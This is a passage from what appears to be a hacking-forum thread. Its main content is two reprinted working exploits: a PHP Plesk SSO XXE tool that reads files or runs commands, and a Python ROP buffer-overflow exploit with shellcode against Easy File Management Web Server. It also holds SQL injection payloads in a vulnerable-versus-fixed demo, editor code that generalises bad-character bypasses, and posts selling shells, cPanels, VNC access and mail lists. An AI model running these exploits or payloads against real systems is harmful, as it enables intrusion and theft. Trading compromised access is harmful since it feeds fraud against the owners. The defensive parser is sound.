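PAYLOAD_VERSION = "x' UNION SELECT sqlite_version() -- "   # mirrors 1.1 (version disclosure)
PAYLOAD_DUMP_ALL = "x' OR 1=1 -- "                          # tautology, returns every row

def db_version():
    """What the injected UNION is expected to return on this engine."""
    return sqlite3.sqlite_version

def demo():
    db = make_db()
    return {
        "normal": search_contacts_fixed(db, "ali"),
        "vulnerable_version": search_contacts_vulnerable(db, PAYLOAD_VERSION),
        "vulnerable_dump": search_contacts_vulnerable(db, PAYLOAD_DUMP_ALL),
        "fixed_version": search_contacts_fixed(db, PAYLOAD_VERSION),
        "fixed_dump": search_contacts_fixed(db, PAYLOAD_DUMP_ALL),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print("%-20s %r" % (name, rows))
```

The vendor commits linked above are the MySQL-side equivalent of search_contacts_fixed(): the fix is to stop building SQL from the parameter, not to filter quote characters out of it.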
  16. I don't have any at the moment; if I get hold of some, I'll let you know. -- cPanels/Shells/Mails
  17. VNCs - $1 / each (negotiable for larger orders) -- + 500k mails (Yahoo, Hotmail, Aol, Gmail)
  18. # Exploit Title: Plesk SSO XXE injection (Old bug) Exploit
# Date: 12 06 2014
# Exploit Author: z00
# Software Link: http://www.parallels.com/
# Version: 11.0.9 10.4.4
# Tested on: linux all
<?php
/*
Plesk SSO XXE injection (Old bug) Exploit
Coded by z00 (electrocode)
Twitter: electrocode
Note: if Tor is not installed, remove the proxy part
Bug found: http://makthepla.net/blog/=/plesk-sso-xxe-xss
May the Berat night be blessed for the whole Islamic world, pray :)
*/
function Gonder($domain, $komut, $method) {
    // Entity target: expect:// runs a command (needs the expect extension), file:// reads a file
    switch ($method) {
        case "cmd":
            $komut = "expect://$komut";
            break;
        case "read":
            $komut = "file://$komut";
            break;
        default:
            $komut = "file://$komut";
    }
    $adres = "https://$domain:8443/relay";
    // SAML AuthnRequest with a DOCTYPE that defines the external entity; the Issuer and
    // the UI/URL extension both reference it, so the endpoint echoes the entity content back
    $paket = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>"
        . "<!DOCTYPE doc [ <!ENTITY xxe SYSTEM \"$komut\"> ] > "
        . "<samlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"dff578c3049f5ba10223df820123fcccbc134e7520\" Version=\"2.0\" IssueInstant=\"2014-05-08T11:58:33Z\" Destination=\"javascript:prompt(document.domain,document.cookie)\"> "
        . "<saml:Issuer>&xxe;</saml:Issuer> "
        . "<samlp:Extensions> <UI><URL>&xxe;</URL></UI> </samlp:Extensions> "
        . "<ds:Signature xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\"> "
        . "<ds:SignedInfo><ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/> "
        . "<ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/> "
        . "<ds:Reference URI=\"#dff578c3049f5ba10223df820123fcccbc134e7520\"><ds:Transforms><ds:Transform Algorithm=\"http://www.w3.org/2000/09/xmldsig#enveloped-signature\"/><ds:Transform Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/></ds:Transforms><ds:DigestMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#sha1\"/><ds:DigestValue>5BWiyX9zvACGR5y+NB2wxuXJtJE=</ds:DigestValue></ds:Reference></ds:SignedInfo>"
        . "<ds:SignatureValue>S4LhCUOB0ylT4cjXUVAbnvrBjBBzybaxvWHTGw9JnRsyUB1MetRK+VHvV/M3Q4NX0DGUNFXlCZR3sM2msQOAhbjZxkKQCNUBig56/03pgsXlpWJFhnBL8m0sRRZBduf4QdHn/hxxyvAKzadPQ5nmIPmCPpO1CQsRUTMrt/13VIE=</ds:SignatureValue> "
        . "</ds:Signature></samlp:AuthnRequest>";
    $exploit = urlencode(base64_encode($paket));
    $relaystate = gethostbyname($domain);
    $relayadres = urlencode(base64_encode($relaystate));
    $postlar = "SAMLRequest=$exploit&response_url=http://hax&RelayState=$relayadres&RefererScheme=https&RefererHost=https://$domain:8443&RefererPort=8443";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $adres);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
    curl_setopt($ch, CURLOPT_REFERER, $adres);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    // Proxy (Tor SOCKS5)
    curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9050");
    curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
    // Proxy end
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postlar);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $sonuc = curl_exec($ch);
    curl_close($ch);

    $gelenpaket = //"Packet: " . $postlar . "Sent packet size: " .
        strlen($exploit) . "\nRelayAddr: $relaystate\nResult: \r\n\r\n$sonuc \n";
    return $gelenpaket;
}

if ($argc < 4) {
    $kullanim  = "########################################################################\n";
    $kullanim .= "Plesk XXE Exploit Tool by z00\n";
    $kullanim .= "Usage   : php $argv[0] domain /etc/passwd read\n";
    $kullanim .= "Example : php $argv[0] address cmd (only if expect is installed) method\n";
    $kullanim .= "Available methods:\ncmd (if expect is installed)\nread (reads a file)\n";
    $kullanim .= "########################################################################\r\n";
    echo $kullanim;
} else {
    $domain = $argv[1];
    $komut = $argv[2];
    $method = $argv[3];
    echo Gonder($domain, $komut, $method);
}
?>
source
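The exploit works only because the /relay endpoint hands a client-supplied SAMLRequest to an XML parser that honours the DOCTYPE and resolves the SYSTEM entity. The block below is an added example by the editor, not Plesk code: the same request parsed with the standard-library expat parser configured to refuse any DOCTYPE and any external entity before resolution, so the Issuer of a clean AuthnRequest is returned and the exploit's payload is rejected. The two request bodies are constructed samples that mirror the shape of the exploit's packet; the function and helper names are the editor's.

```python
# Added example (not Plesk code): parsing a SAMLRequest the way the /relay endpoint
# should have, so the DOCTYPE/ENTITY trick in the exploit above is refused before
# any entity is resolved. Standard-library expat only; request bodies are constructed.
import base64
import xml.parsers.expat as expat

SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"

class UnsafeXML(Exception):
    pass

def parse_saml_issuer(xml_bytes):
    """Return the <saml:Issuer> text; raise UnsafeXML on any DOCTYPE or external entity."""
    p = expat.ParserCreate(namespace_separator=" ")
    # Defence in depth: refuse DOCTYPE outright and never load parameter entities.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    state = {"in_issuer": False, "issuer": ""}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE not allowed in SAMLRequest")

    def on_external_entity(context, base, sysid, pubid):
        raise UnsafeXML("external entity reference: %r" % sysid)

    def on_start(name, attrs):
        state["in_issuer"] = (name == SAML_NS + " Issuer")

    def on_end(name):
        state["in_issuer"] = False

    def on_chars(data):
        if state["in_issuer"]:
            state["issuer"] += data

    p.StartDoctypeDeclHandler = on_doctype
    p.ExternalEntityRefHandler = on_external_entity
    p.StartElementHandler = on_start
    p.EndElementHandler = on_end
    p.CharacterDataHandler = on_chars
    p.Parse(xml_bytes, True)
    return state["issuer"].strip()

def encode_request(xml_bytes):
    """Base64 the body the way the SAMLRequest form field carries it."""
    return base64.b64encode(xml_bytes)

def relay_is_safe(samlrequest_b64):
    """What a hardened /relay does first: decode, parse strictly, never echo entity text."""
    try:
        parse_saml_issuer(base64.b64decode(samlrequest_b64))
        return True
    except (UnsafeXML, expat.ExpatError, ValueError):
        return False

# Constructed sample bodies; EVIL mirrors the exploit's DOCTYPE and &xxe; references.
GOOD = b"""<?xml version="1.0"?>
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
 xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_1" Version="2.0">
 <saml:Issuer>https://idp.example.test</saml:Issuer>
</samlp:AuthnRequest>"""

EVIL = b"""<?xml version="1.0"?>
<!DOCTYPE doc [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
 xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_1" Version="2.0">
 <saml:Issuer>&xxe;</saml:Issuer>
</samlp:AuthnRequest>"""

if __name__ == "__main__":
    print("good issuer:", parse_saml_issuer(GOOD))
    print("evil accepted:", relay_is_safe(encode_request(EVIL)))
```

Rejecting the DOCTYPE is the decisive check; the ExternalEntityRefHandler is there so that a parser configuration change elsewhere cannot quietly reopen the hole.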
  19. #!/usr/bin/python
# Exploit Title: Easy File Management Web Server v5.3 - USERID Remote Buffer Overflow (ROP)
# Version: 5.3
# Date: 2014-05-31
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.efssoft.com/
# Tested on: WinXP-GER, Win7x64-GER, Win8-EN, Win8x64-GER
#
# Credits for vulnerability discovery:
# superkojiman (http://www.exploit-db.com/exploits/33453/)
#
# Howto / Notes:
# This script exploits the buffer overflow vulnerability caused by an oversized UserID string as
# discovered by superkojiman. In comparison to superkojiman's exploit, this exploit does not
# brute force the address of the overwritten stack part; instead it uses code from its own
# .text segment to achieve reliable code execution.

from struct import pack
import socket, sys

host = "192.168.0.1"
port = 80

junk0 = "\x90" * 80

# Instead of bruteforcing the stack address, let's take an address
# from the .text segment, which is near to the stackpivot instruction:
# 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll]
# The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job!
# Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8
call_edx = pack('<L', 0x1001D8C8)

junk1 = "\x90" * 280

ppr = pack('<L', 0x10010101)        # POP EBX # POP ECX # RETN [ImageLoad.dll]
# Since 0x00 would break the exploit, the 0x00457452 (JMP ESP [fmws.exe]) needs to be crafted on the stack
crafted_jmp_esp = pack('<L', 0xA445ABCF)
test_bl = pack('<L', 0x10010125)    # contains 00000000 to pass the JNZ instruction
kungfu = pack('<L', 0x10022aac)     # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll]
kungfu += pack('<L', 0xDEADBEEF)    # filler
kungfu += pack('<L', 0xDEADBEEF)    # filler
kungfu += pack('<L', 0x1001a187)    # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] -> finishes crafting JMP ESP
kungfu += pack('<L', 0x1002466d)    # PUSH EAX # RETN [ImageLoad.dll]

nopsled = "\x90" * 20

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
shellcode = ("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9"
             "\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab"
             "\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71"
             "\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09"
             "\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c"
             "\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e"
             "\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78"
             "\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22"
             "\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f"
             "\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28"
             "\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50"
             "\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4"
             "\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56"
             "\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56"
             "\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16"
             "\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea"
             "\xa5\x59\x50")

payload = junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode

buf  = "GET /vfolder.ghp HTTP/1.1\r\n"
buf += "User-Agent: Mozilla/4.0\r\n"
buf += "Host: " + host + ":" + str(port) + "\r\n"
buf += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buf += "Accept-Language: en-us\r\n"
buf += "Accept-Encoding: gzip, deflate\r\n"
buf += "Referer: http://" + host + "/\r\n"
buf += "Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n"
buf += "Connection: Keep-Alive\r\n\r\n"

print "[*] Connecting to Host " + host + "..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host, port))
    print "[*] Connected to " + host + "!"
except:
    print "[!] " + host + " didn't respond\n"
    sys.exit(0)
print "[*] Sending malformed request..."
s.send(buf)
print "[!] Exploit has been sent!\n"
s.close()
source
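The one non-obvious step in the chain above is the "crafted JMP ESP": the real gadget sits at 0x00457452 in fmws.exe, whose leading NUL byte would terminate the UserID string, so the exploit loads 0xA445ABCF into EBX, moves it to EAX and lets the fixed ADD EAX,5BFFC883 gadget wrap it around to the real address. The block below is an added example by the editor, not part of the exploit: it performs that 32-bit arithmetic, checks operands against the bad-character set the shellcode was encoded for, and generalises to the case where both operands are attacker-chosen. The two constants are the exploit's; find_split() and its random search are the editor's.

```python
# Added example (not part of the exploit above): the arithmetic behind the
# "crafted JMP ESP" trick. JMP ESP lives at 0x00457452 (contains a NUL byte);
# the exploit puts 0xA445ABCF on the stack and lets ADD EAX,5BFFC883 wrap it
# around to the real address. find_split() is the editor's generalisation.
import os

MASK = 0xFFFFFFFF
BADCHARS = b"\x00\x0a\x0d"   # the msfencode -b set used for the payload above

def add32(a, b):
    """32-bit wrapping addition, as the x86 ADD instruction performs it."""
    return (a + b) & MASK

def has_badchar(value, badchars=BADCHARS):
    """True if any byte of the little-endian DWORD is in the bad-character set."""
    return any(byte in badchars for byte in value.to_bytes(4, "little"))

def operand_for(target, fixed_immediate, badchars=BADCHARS):
    """Value to load before a fixed ADD so that `target` results; None if it
    itself contains a bad byte (then a different gadget is needed)."""
    needed = (target - fixed_immediate) & MASK
    return None if has_badchar(needed, badchars) else needed

def find_split(target, badchars=BADCHARS, tries=10000):
    """Generalisation for when both operands are under the attacker's control:
    pick any (a, b) with a + b == target mod 2**32 and no bad bytes in either."""
    for _ in range(tries):
        a = int.from_bytes(os.urandom(4), "little")
        b = (target - a) & MASK
        if not has_badchar(a, badchars) and not has_badchar(b, badchars):
            return a, b
    return None

if __name__ == "__main__":
    jmp_esp = 0x00457452
    print("bad bytes in JMP ESP address:", has_badchar(jmp_esp))
    print("operand for ADD EAX,5BFFC883: %#010x" % operand_for(jmp_esp, 0x5BFFC883))
    print("free-choice split:", tuple("%#010x" % v for v in find_split(jmp_esp)))
```

operand_for() reproduces the exploit's constant exactly; when it returns None the fixed immediate of the available gadget does not fit the target, which is when a SUB or XOR gadget, or the two-operand find_split() approach, is the next thing to try.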
  20. Hi, yes, I also have some RO. Send me a PM when you're on. -- Shells / cPanels - $2
  21. Yes, give me a buzz when you're around. -- + 150k "mixed" mails (yahoo, hotmail, aol, etc.)
  22. Reckon, I didn't force you to buy from me, get them from the Russians. P.S.: I thought there was a rule forbidding butting in in the market category. -- + 300k Hotmail